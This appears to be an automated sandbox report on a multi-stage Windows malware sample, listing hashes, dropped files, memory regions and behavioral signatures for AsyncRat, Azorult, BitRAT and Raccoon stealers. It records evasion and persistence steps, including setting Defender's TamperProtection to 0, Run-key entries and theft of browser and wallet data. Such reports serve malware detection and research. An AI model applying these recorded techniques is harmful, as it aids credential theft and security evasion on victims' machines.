SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2032-130-0x00000000010A0000-0x00000000010A1000-memory.dmp

memory/1160-134-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1216-136-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1160-138-0x00000000005E0000-0x00000000005FB000-memory.dmp

memory/1164-141-0x0000000000340000-0x00000000003A6000-memory.dmp

memory/748-143-0x0000000000A10000-0x0000000000A70000-memory.dmp

memory/1792-144-0x0000000000000000-mapping.dmp

memory/2032-142-0x0000000000960000-0x00000000009C0000-memory.dmp

memory/1160-145-0x0000000000220000-0x0000000000221000-memory.dmp

memory/1164-147-0x00000000048E0000-0x00000000048E1000-memory.dmp

memory/748-146-0x0000000004700000-0x0000000004701000-memory.dmp

memory/2032-148-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

memory/2032-149-0x00000000004C0000-0x00000000004C2000-memory.dmp

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
SHA1 e980c9bf41330d1e5bd04556db4646a0210f7409
SHA256 16574f51785b0e2fc29c2c61477eb47bb39f714829999511dc8952b43ab17660
SHA512 335a86268e7c0e568b1c30981ec644e6cd332e66f96d2551b58a82515316693c1859d87b4f4b7310cf1ac386cee671580fdd999c3bcb23acf2c2282c01c8798c

\ProgramData\nss3.dll

MD5 bfac4e3c5908856ba17d41edcd455a51
SHA1 8eec7e888767aa9e4cca8ff246eb2aacb9170428
SHA256 e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78
SHA512 2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

\ProgramData\mozglue.dll

MD5 8f73c08a9660691143661bf7332c3c27
SHA1 37fa65dd737c50fda710fdbde89e51374d0c204a
SHA256 3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd
SHA512 0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

\ProgramData\msvcp140.dll

MD5 109f0f02fd37c84bfc7508d4227d7ed5
SHA1 ef7420141bb15ac334d3964082361a460bfdb975
SHA256 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SHA512 46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

\ProgramData\vcruntime140.dll

MD5 7587bf9cb4147022cd5681b015183046
SHA1 f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256 c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SHA512 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1536-159-0x0000000000000000-mapping.dmp

memory/1464-160-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 7c5c07773030f216ff0409611d2f06d1
SHA1 519eaa1e4e4e7f6b07290c5978168e480e401a28
SHA256 daf376acb49aa0f9236dfbc4e7eb75bdc5ae11304797404ba3a080a4c903f296
SHA512 6ae93065172bd4261e526d1f55ffc900c8c93ec567ff0386237379bd4861f330e3848434b3175f1ed8920300947291f7e01e06156068820a46272e22eaaa55d0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 0dc37a4bd816e8134f76f39f9ea7a593
SHA1 8cd1514d97fbd08ffeaf151319ddfd4c7f297fa3
SHA256 cadd24a2521bbe8c686c337769e8b2470c111037613d8b7c91763f9a79a84824
SHA512 f7c13de72653365691d5696fcfe3e2bd29384bdbbab6744a6dce81622f0271a6f06f362393fb8e98b257b07f8e0719b05d835a32d84e46f1bd580c7c4e21bc05

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

MD5 3169930aeb3b395eee5713475d82cfc4
SHA1 2267bdb7e170930d2152d8b904d666d81bedc4b1
SHA256 92763ece5939daf0affa3157c34c637032f7226095b885106651c42318701897
SHA512 85bd0f24270b0891b7f9d9f4c518e60ff5d20f1407acecd2cef2ad558cfc363331a16c3f53c46387b7b5c204e0a208b745b2cf50c38eac46e00b510209b5398d

\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1268-168-0x0000000000400000-0x00000000007E4000-memory.dmp

memory/1160-169-0x0000000004600000-0x0000000004621000-memory.dmp

memory/1268-170-0x00000000007E2730-mapping.dmp

memory/1908-172-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\P3Uxmyfcqp.exe

MD5 23dd723300b2c35a6c94ab0a53293f82
SHA1 8a7fcbc04ea369cd9c2e2f41b0846b7ed12b0f16
SHA256 0088daad429de39bd42663b9b508af98da7b8a3d09e4b7ff0012a8901a32253b
SHA512 ca20ab23308d75a09b01a857215a4f88e3a9f7ce1355096010acef119ed12de51a44033d149e1b632c677861b5d8617a211e7faa499ad59423b49bd02460f047

memory/1164-178-0x0000000004A20000-0x0000000004A97000-memory.dmp

memory/748-177-0x0000000004CC0000-0x0000000004D32000-memory.dmp

memory/2052-184-0x00000000004019E4-mapping.dmp

memory/2032-191-0x0000000004D50000-0x0000000004DC2000-memory.dmp

memory/2124-190-0x0000000000000000-mapping.dmp

memory/2108-189-0x0000000000000000-mapping.dmp

memory/2164-193-0x0000000000000000-mapping.dmp

C:\Users\Public\UKO.bat

MD5 eaf8d967454c3bbddbf2e05a421411f8
SHA1 6170880409b24de75c2dc3d56a506fbff7f6622c
SHA256 f35f2658455a2e40f151549a7d6465a836c33fa9109e67623916f889849eac56
SHA512 fe5be5c673e99f70c93019d01abb0a29dd2ecf25b2d895190ff551f020c28e7d8f99f65007f440f0f76c5bcac343b2a179a94d190c938ea3b9e1197890a412e9

memory/2032-194-0x0000000000BF0000-0x0000000000C0F000-memory.dmp

C:\Users\Public\Trast.bat

MD5 4068c9f69fcd8a171c67f81d4a952a54
SHA1 4d2536a8c28cdcc17465e20d6693fb9e8e713b36
SHA256 24222300c78180b50ed1f8361ba63cb27316ec994c1c9079708a51b4a1a9d810
SHA512 a64f9319acc51fffd0491c74dcd9c9084c2783b82f95727e4bfe387a8528c6dcf68f11418e88f1e133d115daf907549c86dd7ad866b2a7938add5225fbb2811d

memory/2052-187-0x0000000000400000-0x0000000000405000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2052-182-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2052-181-0x0000000000400000-0x0000000000405000-memory.dmp

memory/2052-180-0x0000000000400000-0x0000000000405000-memory.dmp

\Users\Admin\AppData\Local\Temp\8GGn8x0ymA.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/1268-176-0x0000000000400000-0x00000000007E4000-memory.dmp

\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/748-199-0x00000000007C0000-0x00000000007E0000-memory.dmp

memory/2192-198-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iw2xxaKP8C.exe

MD5 6439889cfd410e3b57422781c93e26cf
SHA1 12280091094281fa60fa8321006abfc7c4bd4e33
SHA256 c58ec23d6e9d1f548d0d9375009bf23ebfb9f40eb9bb14fccc4e10f385f53d5d
SHA512 1c2e9e52e4596e939d830556729ff53b75503e8e695f76e6607c7e6147562ba8e5183678ad990b3070cc70f5b4867ac8263209f7ba2213460a46789dbc24c86e

memory/2192-200-0x0000000000403BEE-mapping.dmp

memory/1164-197-0x0000000001F20000-0x0000000001F46000-memory.dmp

memory/2220-196-0x0000000000000000-mapping.dmp

memory/2264-202-0x0000000000000000-mapping.dmp

memory/2192-203-0x0000000000400000-0x0000000000408000-memory.dmp

\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2304-206-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2304-207-0x000000000040616E-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\k3hnMCzeNI.exe

MD5 df5e3ee9a6098d1e29b31603672d5a8f
SHA1 0af2378effff0a7451317874efe4e6682365c03e
SHA256 fa98235aae1687afb628d39a16645b6d2f4afeb97d113229c660425464e296c2
SHA512 8fe4afbddb19fcd95eef6e7b2f944af68f1f09985ac28a4674c4301e48b245084865a8ffc483e7268982286dbb766bf30a2755fcdc7853a85bb629adf26035d9

memory/2304-209-0x0000000000400000-0x000000000040C000-memory.dmp

memory/2376-211-0x0000000000000000-mapping.dmp

memory/2404-213-0x0000000000000000-mapping.dmp

memory/2428-214-0x0000000000000000-mapping.dmp

C:\Windows\temp\qlmkdkl1.inf

MD5 74863fac8e9443d4352018f8a41f999a
SHA1 5af1c9eaaea81ebb081af89faa3b872173e55758
SHA256 31aa06a6d25bb696e68b72f546bf44bd7a3bb40b681ce1cac10bcdaa4d88cc15
SHA512 932ec75b4f71b77173fdcfa884e6557f1cc20ee9e73de824c9d420c76e97473298390ff6c3b183092700709e3d2dffc6007f43b26dc72912d4b6215073f9f51a

C:\Users\Admin\AppData\Local\Temp\tmpF1FD.tmp

MD5 ac9ba09a7d6fa1b7b28bdfccb8891315
SHA1 911e075176c36daeee8ea457939b56385de09fc2
SHA256 e8eaba3b34b3aa0b45fc3258cbfdd20dff2432a2e5c130fc194ac37d619fc5a9
SHA512 67c0247df9fbb06a14bd794513fa9354bf9551eaa8b69926988e74452fed5c46b4c8dd2e6e21a4bcff651b70ee99f3c19605044509a4f98cde4ac75fd17e55b2

\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2476-220-0x0000000000400000-0x0000000000412000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4fBv2zvEYi.exe

MD5 abeb86fdec0060ffb80f364cabd30b1b
SHA1 3c9c7b3ee66ff071eb32848ad5a62fab9683427c
SHA256 2d5d1a4d6bc5abb1e0ad26c3d9801a44317d0a50a370db5de488763b98fc766b
SHA512 c23e558f3fd6b426a2d076c95fed01fcedb3ddd6a81be36e57c845b06ce3bd8d59dbd1e759246d8a523d6c335d3dd669c8e1fdf533701ac93dc346a5948467f4

memory/2476-221-0x000000000040C71E-mapping.dmp

memory/2476-223-0x0000000000400000-0x0000000000412000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2404-226-0x0000000000D40000-0x0000000000D41000-memory.dmp

memory/2404-227-0x00000000048F0000-0x00000000048F1000-memory.dmp

memory/2404-229-0x00000000048B0000-0x00000000048B1000-memory.dmp

memory/2304-228-0x00000000003C0000-0x00000000003C1000-memory.dmp

memory/2404-230-0x00000000048B2000-0x00000000048B3000-memory.dmp

memory/2404-231-0x0000000002490000-0x0000000002491000-memory.dmp

memory/2404-232-0x0000000004870000-0x0000000004871000-memory.dmp

memory/2404-235-0x0000000005670000-0x0000000005671000-memory.dmp

memory/2404-253-0x000000007EF30000-0x000000007EF31000-memory.dmp

memory/2476-267-0x0000000004D10000-0x0000000004D11000-memory.dmp

memory/2812-268-0x0000000000000000-mapping.dmp

C:\Users\Public\nest.bat

MD5 8ada51400b7915de2124baaf75e3414c
SHA1 1a7b9db12184ab7fd7fce1c383f9670a00adb081
SHA256 45aa3957c29865260a78f03eef18ae9aebdbf7bea751ecc88be4a799f2bb46c7
SHA512 9afc138157a4565294ca49942579cdb6f5d8084e56f9354738de62b585f4c0fa3e7f2cbc9541827f2084e3ff36c46eed29b46f5dd2444062ffcd05c599992e68

memory/2844-270-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2968-272-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

MD5 a551bc7c95ea5dd39255a0fc48033f89
SHA1 2056ee8482eaac060e050e15441999cfdf4385b3
SHA256 eeed35b6db912ba4accd50f23c4abd5f517cf9bb2981e1286c1783424121be14
SHA512 ddf108737bf9113abc8ba1a53c916f5d9be1cf0b9e8db00954b1798595de3957615871d19d2c1c4e0bee1e9786c3c63f09af66a539918c8b5bad54b2e70a0180

memory/2968-278-0x00000000002A0000-0x00000000002A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZJL1OKS0\Ceutdxblshrdzspwhpvvjqjnojgrlfy[1]

MD5 0255607b1e1f1aedb2bcff935b95f31b
SHA1 9fe5206a03f6b4cd76e07930347f50b27d171f35
SHA256 44e63a074b3e2961cabd7809f22cd0d579c52231254b104ec7a18f04964fda00
SHA512 30d4b39d668393dd8b142cd8526a22a25fcb3665d4628f6742df4c1402ef39ab72724a344f9bc2de5022fdc2abc97f4c0a060d42175b443450a88554f61d38d9

memory/1772-289-0x00000000004019E4-mapping.dmp

memory/1160-292-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2021-08-05 10:31

Reported: 2021-08-05 10:33

Platform: win10v20210408

Max time kernel: 147s

Max time network: 155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

Signatures

AsyncRat

rat asyncrat

Azorult

trojan infostealer azorult

BitRAT

trojan bitrat

BitRAT Payload

Description Indicator Process Target
N/A N/A N/A N/A

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan

Oski

infostealer oski

Raccoon

stealer raccoon

Raccoon Stealer Payload

Description Indicator Process Target
N/A N/A N/A N/A

suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

suricata

suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18

suricata

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Abthdwq = "C:\\Users\\Public\\Libraries\\qwdhtbA.url" C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Ceutdxb = "C:\\Users\\Public\\Libraries\\bxdtueC.url" C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe N/A

Checks installed software on the system

discovery

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe N/A
N/A N/A C:\ProgramData\GFDyrtucbvfdg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
